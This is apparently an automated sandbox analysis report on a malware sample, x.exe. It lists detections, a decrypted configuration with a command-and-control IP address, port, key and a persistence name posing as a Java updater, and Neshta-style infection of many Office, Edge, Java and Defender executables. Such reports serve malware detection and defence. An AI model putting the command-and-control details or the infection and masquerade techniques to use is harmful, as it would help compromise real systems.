                              Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\AutoIt3\Uninstall.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXEJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: x.exeJoe Sandbox ML: detected
                              Sample uses string decryption to hide its real strings
                              Source: 2.2.x.exe.30cf840.1.raw.unpackString decryptor: 45.141.26.232
                              Source: 2.2.x.exe.30cf840.1.raw.unpackString decryptor: 6666
                              Source: 2.2.x.exe.30cf840.1.raw.unpackString decryptor: <123456789>
                              Source: 2.2.x.exe.30cf840.1.raw.unpackString decryptor: <Xwormmm>
                              Source: 2.2.x.exe.30cf840.1.raw.unpackString decryptor: X
                              Source: 2.2.x.exe.30cf840.1.raw.unpackString decryptor: USB.exe
                              Source: 2.2.x.exe.30cf840.1.raw.unpackString decryptor: %ProgramData%
                              Source: 2.2.x.exe.30cf840.1.raw.unpackString decryptor: Java Update Checker (64 bit).exe
                              Source: x.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdb source: pwahelper.exe.0.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\cookie_exporter.exe.pdb source: cookie_exporter.exe.0.dr
                              Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: armsvc.exe.0.dr
                              Source: Binary string: mpextms.pdb source: mpextms.exe0.0.dr
                              Source: Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb source: OSPPREARM.EXE.3.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\identity_helper.exe.pdbOGP source: identity_helper.exe.0.dr
                              Source: Binary string: MicrosoftEdgeUpdateBroker_unsigned.pdb source: MicrosoftEdgeUpdateBroker.exe.3.dr
                              Source: Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb source: DW20.EXE.0.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdb source: msedge_proxy.exe.3.dr
                              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\postc2rcross\x-none\appsharinghookcontroller.pdbr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: AppSharingHookController64.exe.3.dr
                              Source: Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\Common.DBConnection64.pdb source: Common.DBConnection64.exe.0.dr
                              Source: Binary string: MicrosoftEdgeComRegisterShellARM64_unsigned.pdb source: MicrosoftEdgeComRegisterShellARM64.exe.3.dr
                              Source: Binary string: MicrosoftEdgeUpdate_unsigned.pdb source: MicrosoftEdgeUpdate.exe.0.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdbOGP source: msedge_proxy.exe.3.dr
                              Source: Binary string: D:\a\_work\1\s\bin\x86\Release\Product\Binaries\Client\bin\Microsoft.Mashup.Container.Loader.pdb source: Microsoft.Mashup.Container.Loader.exe.3.dr
                              Source: Binary string: GoogleCrashHandler64_unsigned.pdb source: GoogleCrashHandler64.exe.0.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_pwa_launcher.exe.pdb source: msedge_pwa_launcher.exe.0.dr
                              Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\Aut2Exe\Aut2Exe.pdb source: Aut2exe.exe.0.dr
                              Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\AdobeARMHelper.pdb source: AdobeARMHelper.exe.0.dr
                              Source: Binary string: d:\dbs\el\omr\target\x86\ship\click2run\x-none\Integrator.pdb source: integrator.exe.0.dr
                              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\unpackexe\unpack200.pdb00 source: unpack200.exe.0.dr
                              Source: Binary string: r.pdb source: AppSharingHookController64.exe.3.dr
                              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\postc2rcross\x-none\appsharinghookcontroller.pdb source: AppSharingHookController64.exe.3.dr
                              Source: Binary string: d:\dbs\el\omr\target\x86\ship\click2run\x-none\Integrator.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: integrator.exe.0.dr
                              Source: Binary string: VSTOInstaller.pdb source: VSTOInstaller.exe.0.dr
                              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\sdxhelper.pdblper.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: SDXHelper.exe.3.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\cookie_exporter.exe.pdbOGP source: cookie_exporter.exe.0.dr
                              Source: Binary string: D:\a\_work\1\s\src\ai\windows\dll\x64\Release\aimgr.pdb source: aimgr.exe.3.dr
                              Source: Binary string: AppVDllSurrogate32.pdb source: AppVDllSurrogate.exe.3.dr
                              Source: Binary string: MicrosoftEdgeComRegisterShellARM64_unsigned.pdbh source: MicrosoftEdgeComRegisterShellARM64.exe.3.dr
                              Source: Binary string: MpCmdRun.pdbGCTL source: MpCmdRun.exe0.0.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_pwa_launcher.exe.pdbOGP source: msedge_pwa_launcher.exe.0.dr
                              Source: Binary string: AppVDllSurrogate32.pdbGCTL source: AppVDllSurrogate.exe.3.dr
                              Source: Binary string: MpCmdRun.pdb source: MpCmdRun.exe0.0.dr
                              Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\AdobeARMHelper.pdbr source: AdobeARMHelper.exe.0.dr
                              Source: Binary string: GoogleCrashHandler64_unsigned.pdbl source: GoogleCrashHandler64.exe.0.dr
                              Source: Binary string: MpDlpCmd.pdbGCTL source: MpDlpCmd.exe.0.dr
                              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\winword.pdb source: WINWORD.EXE.0.dr
                              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\winword.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: WINWORD.EXE.0.dr
                              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\ssvagent\obj\ssvagent.pdb<<7 source: ssvagent.exe.0.dr
                              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\ssvagent\obj\ssvagent.pdb source: ssvagent.exe.0.dr
                              Source: Binary string: lper.pdb source: SDXHelper.exe.3.dr
                              Source: Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: OSPPREARM.EXE.3.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdbOGP source: pwahelper.exe.0.dr
                              Source: Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\DatabaseCompare.pdb source: DATABASECOMPARE.EXE.0.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\identity_helper.exe.pdb source: identity_helper.exe.0.dr
                              Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\mini_installer.exe.pdb source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr
                              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\sdxhelper.pdb source: SDXHelper.exe.3.dr
                              Source: Binary string: MpDlpCmd.pdb source: MpDlpCmd.exe.0.dr
                              Source: Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: DW20.EXE.0.dr
                              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\unpackexe\unpack200.pdb source: unpack200.exe.0.dr
                              Source: Binary string: mpextms.pdbGCTL source: mpextms.exe0.0.dr
                              Source: Binary string: D:\a\_work\1\s\bin\x86\Release\Product\Binaries\Client\bin\Microsoft.Mashup.Container.Loader.pdb.. source: Microsoft.Mashup.Container.Loader.exe.3.dr

                              Spreading

                              barindex
                              Yara detected Neshta
                              Source: Yara matchFile source: 00000000.00000002.1905892392.0000000000409000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: x.exe PID: 1292, type: MEMORYSTR
                              Infects executable files (exe, dll, sys, html)
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXEJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\X86\MpCmdRun.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXEJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXEJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXEJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCopyAccelerator.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXEJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\ConfigSecurityPolicy.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXEJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpDefenderCoreService.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXEJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\mpextms.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\NisSrv.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXEJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCmdRun.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
